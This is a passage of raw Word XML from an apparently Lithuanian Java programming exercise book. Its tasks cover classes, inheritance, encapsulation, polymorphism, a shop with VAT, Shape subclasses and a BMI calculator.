      </w:pPr>
      <w:bookmarkStart w:id="88" w:name="_Toc537931749"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU MAIN.JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Klasė turi būti patalpinta į paketą vardu javaobjects. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti sukurti du automobiliai Toyota ir Mercedes. Automobilių objektai turi būti sukurti naudojant </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1 užduotyje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sukurtą Car.java brėžinį. Patikrinti ar automobiliai moka važiuoti ir kuris automobilis yra greitesnis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc1155920709"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PAKEISKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTĄ CAR.JAVA KLASĘ TAIP, KAD BŪTŲ PASLĖPTA PAPROGRAMĖ CANDRIVE(). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Taip pat pakeiskite parametro „spalva” savybę taip, kad jo negalima būtų keisti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="90" w:name="_Toc1593062369"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA KLASĘ VARDU JAVAENCAPSULATION.JAVA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javaobjects. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi parodyti Java inkapsuliacijos principą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc2004682723"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA KLASĘ VARDU TOYOTA.JAVA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javaobjects. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi paveldėti visas savybės iš klasės Car.java (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Papildomai mūsų automobilis turi turėti naują parametrą: variklio tipas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc793373652"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU MERCEDES.JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Klasė turi būti patalpinta į paketą vardu javaobjects. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi paveldėti visas savybės iš klasės Car.java (</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Papildomai mūsų automobilis turi turėti naują parametrą: sėdimų vietų skaičius</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc1190180308"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. PAKEISKITE </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTĄ TOYOTA.JAVA KLASĘ TAIP, KAD AUTOMOBILIS GALĖTŲ NE TIK VAŽIUOTI BET IR SKRISTI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc1746563840"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE KLASES DEMOPOLYMORPHISM.JAVA IR TEST.JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė DemoPolymorphism.java turi realizuoti statinio polimorfizmo principą. Klasė Test.java turi patikrinti šią savybę</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc528508086"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAGAL PATEIKTĄ PARDUOTUVĖS KLASIŲ DIAGRAMĄ SUKURKITE REIKALINGAS KLASES IR INTERFEISUS SU REIKALINGAIS KLASIŲ LAUKAIS, PAPROGRAMĖMIS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Turi būti realizuota parduotuvė su prekių grupėmis: Product, Medicine, Periodical ir prekių krepšeliu, kuris moka skaičiuoti prekių kainą su ir be PVM. Prekių grupės privalo turėti nustatytą savo prekių kategorijai PVM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc2103703769"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63880730" wp14:editId="7488996C">
            <wp:extent cx="5751195" cy="2571115"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="187" name="Picture 7" descr="Package zwac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ckage zwaclaw"/>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1195" cy="2571115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc937792120"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAGAL PATEIKTAS KLASES NUBRAIŽYKITE UML JAVA KLASIŲ DIAGRAMĄ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>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Shape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col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hape(String color)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color = col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Overr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toString()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Shape[color=" + color +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Area()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err.println("Shape unknown! Cannot compute area!");</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0;</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rFonts w:eastAsia="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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package javaobjects;</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public class Rectangle extends Shap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rivate int length;</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rivate int width;</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ublic Rectangle(String color, int length, int width)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super(col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this.length = length;</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this.width = width;</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Overr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ublic String toString()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return "Rectangle[length=" + length + ",width=" + width + "," + super.toString() +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Overr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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>public double getArea()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return length * width;</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rFonts w:eastAsia="DejaVu Sans Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>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package javaobjects;</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public class Triangle extends Shap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rivate int bas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rivate int heigh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public Triangle(String color, int base, int height)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super(colo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this.base = bas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this.height = heigh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Overr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ublic String toString()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return "Triangle[base=" + base + ",height=" + height + "," + super.toString() +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Overrid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public double getArea()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r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t>return 0.5 * base * heigh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sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>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4"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. TRIMATĖJE KOORDINAČIŲ SISTEMOJE REIKIA SAUGOTI TAŠKŲ KOORDINATES. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006F1DA8" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Taškai be koordinačių taip pat turi spalvą ir svorį. Sukurkite rei</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>kiamą klasę koordinatės taškui POINT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. NORINT PATIKRINTI ŽMOGAUS KŪNO MASĖS INDEKSĄ, REIKALINGAS SKAIČIUOTUVAS. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="006F1DA8" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Sukurkite projektą BMI</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, skirtą šiai užduočiai</w:t>
      </w:r>
      <w:r>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Turi būti galimybė atlikti kūno masės skaičiavimo veiksmus nekuriant papildomų objektų. Projekte sukurti metodus: bmiCount, kuris skaičiuotų žmogaus kūno masės indeksą, readFromConsole, kuris leistų įvesti žmogaus aukštį ir svorį iš komandinės eilutės ir printbmi, kuris atspausdintų žmogaus BMI komandinėje eilutėje ir įrašytų šią informaciją į failą vardu bmi.txt. Klasės metodų veikimą pademonstruokite Main metode</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="98" w:name="_Toc10443966"/>
      <w:bookmarkStart w:id="99" w:name="_Toc13095515"/>
      <w:bookmarkStart w:id="100" w:name="_Toc13833409"/>
      <w:bookmarkStart w:id="101" w:name="_Toc14392424"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
